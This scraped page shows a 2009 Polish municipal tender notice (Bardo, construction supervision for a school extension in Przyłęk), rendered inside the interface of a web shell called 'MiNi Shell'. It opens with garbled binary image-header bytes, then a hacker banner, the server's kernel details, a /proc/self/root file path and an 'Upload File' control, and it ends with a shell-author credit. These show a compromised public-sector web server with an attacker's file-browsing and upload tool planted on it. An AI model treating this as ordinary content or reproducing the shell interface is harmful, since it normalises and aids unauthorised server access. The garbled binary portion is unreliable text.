JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090504/132386-N-2009.html

<p class="kh_header"><b>Bardo: pełnienie funkcji nadzoru inwestorskiego nad realizacją i w okresie gwarancji robót budowlanych w ramach zadania: Rozbudowa szkoły podstawowej dla potrzeb gimnazjum wraz z infrastrukturą techniczną w miejscowości Przyłęk  gmina Bardo</b><br>
<b>Numer ogłoszenia: 132386 - 2009; data zamieszczenia: 04.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Bardo , ul. Rynek 2, 57-256 Bardo, woj. dolnośląskie, tel. 074 8171478.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bardo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie funkcji nadzoru inwestorskiego nad realizacją i w okresie gwarancji robót budowlanych w ramach zadania: Rozbudowa szkoły podstawowej dla potrzeb gimnazjum wraz z infrastrukturą techniczną w miejscowości Przyłęk  gmina Bardo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji nadzoru inwestorskiego nad realizacją i w okresie gwarancji wykonania robót budowlanych w ramach inwestycji pn.: Rozbudowa szkoły podstawowej dla potrzeb gimnazjum wraz z infrastrukturą techniczną w miejscowości Przyłęk gmina Bardo, w tym: 
-budowę łącznika między istniejącym budynkiem szkoły a salą gimnastyczną, który będzie zawierał trzy segmenty: dydaktyczny, administracyjny i socjalny,
-przebudowę pomieszczeń w istniejącym budynku szkoły,
-przebudowę i modernizację sali gimnastycznej
-rozbiórkę istniejącego obiektu zlokalizowanego miedzy istniejącym budynkiem szkoły a salą gimnastyczną
-zagospodarowanie terenu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wadium w wysokości 3.000,00- zł ( słownie: trzy tysiące zł) należy wnieść w formach określonych w art.45 ust.6 Prawo zamówień publicznych. 
2. Jeśli wadium wniesione będzie w pieniądzu, należy je wpłacić na konto: BS w Ząbkowicach Śl. O/Bardo 18 9533 1043 2002 0000 3098 0002 w terminie zapewniającym spłynięcie środków na ww konto przed otwarciem ofert. 
3. Wadium wniesione w innej formie należy złożyć w oryginale w Referacie Finansowym Urzędu Miasta 
i Gminy w Bardzie jako depozyt, za potwierdzeniem. 
4. Dowód przelewu lub potwierdzenie depozytu należy dołączyć do oferty (w przypadku przelewu kserokopię odcinka D).
5. Poręczenia bankowe, gwarancje bankowe i ubezpieczeniowe, poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 09.11.2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. Nr 42, poz. 275 z 2007 r. z późn. zm.) muszą nieodwołalnie i bezwarunkowo zobowiązywać poręczyciela lub gwaranta do zapłaty kwoty pieniężnej na pierwsze wezwanie Zamawiającego, w wysokości odpowiadającej kwocie wadium.
6. Wadium zostanie zwrócone w trybie określonym w art.46 - Prawo zamówień publicznych. Dyspozycję w zakresie wypłaty wadium dla Wykonawców, których oferty nie zostaną wybrane, Zamawiający przekaże niezwłocznie po podpisaniu umowy z Wykonawcą, którego oferta została wybrana, lecz nie później niż następnego dnia po zakończeniu ważności oferty. 
7. Wadium Wykonawców, których oferty zostaną uznane za nieważne zostanie zwrócone na zasadach określonych w art.46 Prawa zamówień Publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy składający ofertę muszą spełniać warunki określone w art. 22 ust. 1  - Prawa Zamówień Publicznych tj:
1. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 - Prawa Zamówień Publicznych,
2. Prowadzą działalność tożsamą z niniejszym zamówieniem. 
3. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Pożądane doświadczenie to zrealizowanie w ostatnich trzech latach co najmniej trzech zamówień o charakterze i złożoności porównywalnej z zakresem niniejszego postępowania, o łącznej wartości brutto nadzorowanych robót nie mniejszej niż 2.500.000 zł, a jeżeli okres działalności jest krótszy - w tym okresie, wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje zawierające wartość i zakres nadzorowanych zadań oraz ocenę usług) 
    Za osoby zdolne do wykonania zamówienia Zamawiający uważa kadrę techniczną posiadającą wymagane Prawem Budowlanym uprawnienia budowlanego bez ograniczeń w specjalności:
- konstrukcyjno-budowlanej;
- instalacyjnej  w zakresie sieci i urządzeń wodociągowych i kanalizacyjnych, cieplnych i wentylacyjnych;
- instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych, 
4. Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą jak: 150.000,-zł.
5. Ocena spełniania warunków wymaganych od  Wykonawców zostanie dokonana według formuły
       SPEŁNIA - NIE SPEŁNIA.
Nie spełnienie chociażby jednego warunku postawionego w niniejszej Specyfikacji Istotnych Warunków Zamówienia skutkować będzie wykluczeniem Wykonawcy z postępowania o uzyskanie zamówienia publicznego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć ofertę przetargową wg zał. nr 1 w sposób określony w pkt. 12 SIWZ oraz złożyć :

1. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiadanych uprawnień do wykonywania określonej działalności lub czynności związanych z przedmiotem zamówienia oraz że nie podlega wykluczeniu na podstawie art.24 Prawa Zamówień Publicznych
1) wymagane oświadczenia zgodnie ze wzorem oferty przetargowej załącznik nr 1 do SIWZ -załącznik nr 1,

W przypadku złożenia oferty wspólnej, oświadczenia powinny być przedłożone w formie pisemnej osobno
 przez wszystkich Wykonawców składających tę ofertę lub przez pełnomocnika ustanowionego zgodnie
 z art. 23 ust. 2 Ustawy Prawo Zamówień Publicznych - pełnomocnictwo stanowi załącznik do oferty.

2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert -załącznik nr 2,

W przypadku gdy przedstawiony odpis z rejestru nie odzwierciedla stanu faktycznego i może wprowadzić 
 w błąd, co do poprawności złożenia oferty (uprawnienia do jej podpisywania) wymagane jest przedłożenie 
złożonego wniosku o wpis do odpowiedniego rejestru zawierającego dane o zmianie stanu np. reprezentacji. 


2. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiadania niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także  że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia

1) wykaz kadry technicznej i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; wykonawca w przedmiotowym wykazie zobowiązany jest do wskazania osób, które pełnić będą funkcje inspektorów nadzoru - załącznik nr 3 wg wzoru (załącznik nr 3 SIWZ),

Zamawiający dopuszcza realizację zamówienia w ramach oferty wspólnej.  W związku z powyższym należy w powyższych przypadkach dołączyć dokumenty określone w pkt. 6.4 ust. 1i 2.  

2) Dokumenty stwierdzające, że osoby przewidziane do pełnienia funkcji inspektora nadzoru posiadają uprawnienia budowlane stosowne do powierzonych im funkcji do nadzoru nad robotami budowlanymi bez ograniczeń w specjalnościach:
	- konstrukcyjno-budowlanej;
- instalacyjnej  w zakresie sieci i urządzeń wodociągowych i kanalizacyjnych, cieplnych 
i wentylacyjnych;
- instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych, 
tj. kserokopia uprawnień wraz z zaświadczeniem o przynależności do właściwej izby zawodowej - załącznik nr 4,

3) wykaz usług wykonanych w okresie ostatnich trzech lat polegających na pełnieniu nadzoru inwestorskiego nad wykonaniem robót budowlanych, w tym co najmniej trzech zamówień o charakterze i złożoności porównywalnej z zakresem niniejszego postępowania, o łącznej wartości brutto nadzorowanych robót  nie mniejszej niż 2.500.000 zł, a jeżeli okres działalności jest krótszy - w tym okresie, wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje zawierające wartość i zakres nadzorowanych zadań oraz ocenę usług)  - załącznik nr 5 wg wzoru (załącznik nr 2 SIWZ) .

3. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie sytuacji ekonomicznej
 i finansowej zapewniającej wykonanie zamówienia
1) polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą jak: 150.000 zł. - załącznik nr 6,

4. Inne wymagane, niezbędne dokumenty w toku oceny i badania ofert
1) pełnomocnictwo do reprezentowania uczestników konsorcjum w postępowaniu albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego zgodnie z art.23 ust.2 Pzp - każdy z uczestników konsorcjum winien załączyć do oferty dokumenty wskazane w   pkt. 6.1. ust. 2,3,4,5,6  - załącznik nr 7,

2) umowy lub projekty umów podwykonawczych, Wykonawca dołączy do oferty celem akceptacji ich przez Zamawiającego zgodnie z art. 6471 kodeksu cywilnego ( Dz.U. z dnia 14 lutego 2003 r. Nr 49 poz 408) - załącznik nr 8

3) harmonogram finansowy - załącznik nr 9 wg wzoru (załącznik nr 6 SIWZ),

4) dowód wniesienia wadium - załącznik nr 10,

5) pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa  - załącznik nr 11,

6) parafowany projekt umowy ( załącznik nr 4 do SIWZ) - załącznik nr 12.

Wyżej wymienione dokumenty stanowią warunek przyjęcia oferty.

Złożenie wyżej  wymienionych  dokumentów w formie niewłaściwej (np. nie poświadczone za zgodność z oryginałem odpisy lub kopie) spowodują odrzucenie oferty. Wymóg poświadczenia kserokopii, odpisu  dokumentu za zgodność z oryginałem spełniony zostanie w przypadku zamieszczenia na każdej stronie kserokopii dokumentu oświadczenia: Za zgodność z oryginałem, wraz z podpisem osoby (osób) umocowanej (umocowanych) do reprezentowania Wykonawcy składającego ofertę.

Ofertę i  jej  załączniki  podpisuje  osoba  (osoby)  podana  w wyciągu  z  rejestru, wpisie do ewidencji działalności gospodarczej  lub  upoważniona  w  umowie (statucie) do składania  majątkowych  oświadczeń  woli  w  imieniu  firmy  lub osoba    której   udzielono   pełnomocnictwa   szczególnego   na zasadach   zapisanych   w   kodeksie   cywilnym  (pełnomocnictwo stanowi załącznik do oferty)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.biuletyn.abip.pl/bardo-gmina/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UMiG Bardo ul. Rynek 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 10:00, miejsce: UMiG Bardo ul. Rynek 2 (sekretariat ogólny).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 11.06.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com